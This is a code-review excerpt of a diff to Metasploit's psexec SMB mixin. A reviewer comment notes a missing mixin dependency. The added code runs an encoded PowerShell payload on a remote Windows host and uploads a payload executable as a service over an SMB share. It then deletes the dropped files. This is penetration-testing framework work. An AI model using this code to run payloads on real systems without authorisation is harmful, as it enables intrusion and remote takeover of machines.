lib/msf/core/exploit/smb/client/psexec.rb

```diff
@@ -193,6 +194,284 @@ def psexec(command, disconnect=true)
+        fd.close
+      rescue Rex::Proto::SMB::Exceptions::ErrorCode => accesserror
+        print_status("Unable to get handle: #{accesserror}")
+        return false
+      end
+      simple.disconnect("\\\\#{@ip}\\#{@smbshare}")
+    end
+    return true
+  end
+
+  def cleanup_after(*files)
+    begin
+      simple.connect("\\\\#{@ip}\\#{@smbshare}")
+    rescue Rex::Proto::SMB::Exceptions::ErrorCode => accesserror
+      print_error("Unable to connect for cleanup: #{accesserror}. Maybe you'll need to manually remove #{files.join(", "
+)} from the target.")
+      return
+    end
+    print_status("Executing cleanup...")
+    files.each do |file|
+      begin
+        smb_file_rm(file)
+      rescue Rex::Proto::SMB::Exceptions::ErrorCode => cleanuperror
+        print_error("Unable to cleanup #{file}. Error: #{cleanuperror}")
+      end
+    end
+    left = files.collect{ |f| smb_file_exist?(f) }
+    if left.any?
+      print_error("Unable to cleanup. Maybe you'll need to manually remove #{left.join(", ")} from the target.")
+    else
+      print_good("Cleanup was successful")
+    end
+  end
+
+    def powershell
+    ENV['MSF_SERVICENAME'] = datastore['SERVICE_NAME']
+    command = cmd_psh_payload(payload.encoded, payload_instance.arch.first)
+
+    if datastore['PSH::persist'] and not datastore['DisablePayloadHandler']
+      print_warning("You probably want to DisablePayloadHandler and use exploit/multi/handler with the PSH::persist option")
+    end
+
+    # Execute the powershell command
+    print_status("Executing the payload...")
+    begin
+      psexec(command)
+    rescue StandardError => exec_command_error
+      fail_with(Msf::Exploit::Failure::Unknown, "#{peer} - Unable to execute specified command: #{exec_command_error}")
+    end
+  end
+
+  def native_upload
+    filename = datastore['SERVICE_FILENAME'] || "#{rand_text_alpha(8)}.exe"
+    servicename = datastore['SERVICE_NAME'] || rand_text_alpha(8)
+    serviceencoder = datastore['SERVICE_STUB_ENCODER'] || ''
+
+    # Upload the shellcode to a file
+    print_status("Uploading payload...")
+    smbshare = datastore['SHARE']
+    fileprefix = ""
+    # if SHARE = Users/sasha/ or something like this
+    if smbshare =~ /.[\\\/]/
+      subfolder = true
+      smbshare = datastore['SHARE'].dup
+      smbshare = smbshare.gsub(/^[\\\/]/,"")
+      folder_list = smbshare.split(/[\\\/]/)
+      smbshare = folder_list[0]
+      fileprefix = folder_list[1..-1].map {|a| a + "\\"}.join.gsub(/\\$/,"") if folder_list.length > 1
+      simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")
+      fd = smb_open("\\#{fileprefix}\\#{filename}", 'rwct')
+    else
+      subfolder = false
+      simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")
+      fd = smb_open("\\#{filename}", 'rwct')
+    end
+    exe = ''
+    opts = { :servicename => servicename, :serviceencoder => serviceencoder}
+    begin
+      exe = generate_payload_exe_service(opts)
```

Comment:
This method comes from `msf/core/exploit/exe` again a mixin that is not directly required it is included by your change here but is currently out of scope if the module include this mixin does not already provide it.